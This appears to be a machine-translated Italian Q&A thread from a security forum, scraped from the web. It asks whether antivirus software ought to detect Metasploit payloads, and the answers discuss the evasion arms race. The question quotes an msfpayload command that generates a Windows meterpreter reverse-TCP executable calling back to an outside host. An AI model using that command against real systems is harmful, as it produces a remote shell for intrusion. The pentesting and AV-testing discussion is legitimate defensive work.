L'anti-virus dovrebbe rilevare i carichi utili di metasploit?

Naviga le tue risposte
6

Come parte di un test penna per workstation, copio un semplice carico utile metasploit sulla workstation e provo a eseguirlo. Di solito questo è bloccato dal software anti-virus. Tuttavia, a volte non lo è (non chiamerò i trasgressori). Il software AV è in esecuzione e rileva correttamente EICAR, ma non rileva un semplice payload metasploit non codificato.

Il mio istinto è che questo è un errore del software AV e dovrebbe essere segnalato come vulnerabilità. Tuttavia, mi chiedevo se questo comportamento potesse in realtà essere inteso? Esistono argomenti legittimi secondo cui "metasploit non è un virus"?

In questo caso il payload è windows / meterpreter / reverse_tcp codificato come file exe, senza offuscamenti. Generato usando questo comando: 

msfpayload windows/meterpreter/reverse_tcp LHOST=1.2.3.4 X > payload.exe
    
posta paj28 30.01.2015 - 12:29
fonte

3 risposte

2

La risposta logica è che sì, dal momento che Metasploit è in gran parte open source, tutti gli AV dovrebbero rilevare e bloccare i moduli generati da Metasploit se stanno facendo il loro lavoro. Sfortunatamente, la realtà è che è incredibilmente difficile rilevare e bloccare codice / eseguibile malevoli anche se è stato generato con un framework open source come Metasploit. La mia opinione è semplicemente che Metasploit ha avuto un nuovo aggiornamento e che i venditori AV non hanno ancora creato le firme per i nuovi payload generati.

Ecco alcuni dei motivi:

  1. È una corsa agli armamenti come menzionato da TimC. Le aziende AV trovano modi per bloccare il codice maligno tramite firme e rilevamento euristico. Ciò a sua volta riduce l'efficacia dei prodotti e degli strumenti progettati per aggirare l'AV in modo da trovare nuovi modi di bypassare l'AV e incorporarli nei prodotti di evitamento. Gli sviluppatori e i contributori della comunità di Metasploit comprendono i prodotti AV in modo eccellente e con gli aggiornamenti costanti, spesso ci sono nuove tecniche innovative che per un periodo di tempo eviteranno l'AV fino a quando i venditori non riprenderanno.

  • I difensori non condividono le informazioni in modo efficace e ciò comporta che ciò che viene rilevato su un AV potrebbe non essere contrassegnato da un altro per un certo periodo di tempo o per sempre. Mentre il lavoro sta progredendo verso uno standard ( link ), gli affari sono affari e molti venditori hanno le loro norme proprietarie ostacolano effettivamente la condivisione delle informazioni. Un test dei laboratori LastLine ha mostrato quanto tempo può essere necessario per il rilevamento del malware da parte dei fornitori. NOTA BENE: Hanno usato, Virustotal per il test e questo NON è un vero test del mondo ma fornisce informazioni interessanti. Per ulteriori informazioni sull'utilizzo di VirusTotal per i test, vedere: link . In pratica si riduce a non avere la possibilità di utilizzare tutti i meccanismi di rilevamento nell'ambiente VirusTotal.

    • However,Iwonderedifthisbehaviourmightinfactbeintended?Aretherelegitimateargumentsthat"metasploit is not a virus"?

    Nessun venditore di AV vorrebbe fare la lista bianca di Metasploit e sono sicuro che lo classificherebbero volentieri come un virus se potessero. Prova di questo è abbastanza semplice, prova a installare Metasploit su una macchina con AV in esecuzione!

        
    risposta data 27.11.2015 - 15:09
    fonte
    2

    È una corsa agli armamenti. Gli sviluppatori di metasploit vogliono sviluppare plugin che sconfiggono l'anti-virus. Gli sviluppatori di anti-virus vogliono sconfiggere i plugin di metasploit.

    Non possono avere entrambi successo, quindi a volte l'AV distribuirà firme che rilevano tutti i moduli metasploit, a volte gli sviluppatori metasploit troveranno un nuovo modo di eludere l'AV.

    Penseresti che i venditori di AV avessero il vantaggio a causa del fatto che metasploit era open source, ma ovviamente non in questo caso.

        
    risposta data 30.01.2015 - 12:54
    fonte
    0

    Dipende dalla versione di metasploit che stai usando. Nella versione di metasploit pro, puoi usufruire di Dynamic Payloads che possono sicuramente eludere l'antivirus.

    Secondo Rapid7, i carichi utili dinamici possono:

    • Evadete le 10 migliori soluzioni AV in oltre il 90% dei casi. Nessun fornitore AV rileva tutte le opzioni del payload MSP!

    • Utilizzare le correzioni degli errori per rendere le sessioni più stabili rispetto alle normali sessioni MSF

    • Codifica il traffico quando si scarica il carico utile, che può aiutare a eludere IPS

    Prova a caricare il carico utile su Total virus per verificare se altri antivirus rilevano il carico utile o meno. Se un buon numero di antivirus considera il tuo payload come un virus, significa semplicemente che il tuo antivirus non è aggiornato. Prova Aggiornamento delle definizioni dei virus o modifica l'antivirus.

        
    risposta data 27.11.2015 - 09:32
    fonte

    Leggi altre domande sui tag

    Hardening SSL / TLS su Azure Cloud Service per A + su Qualys SSL Labs? Perché i browser deprecano RSA a 1024 bit, ma conservano SHA-1?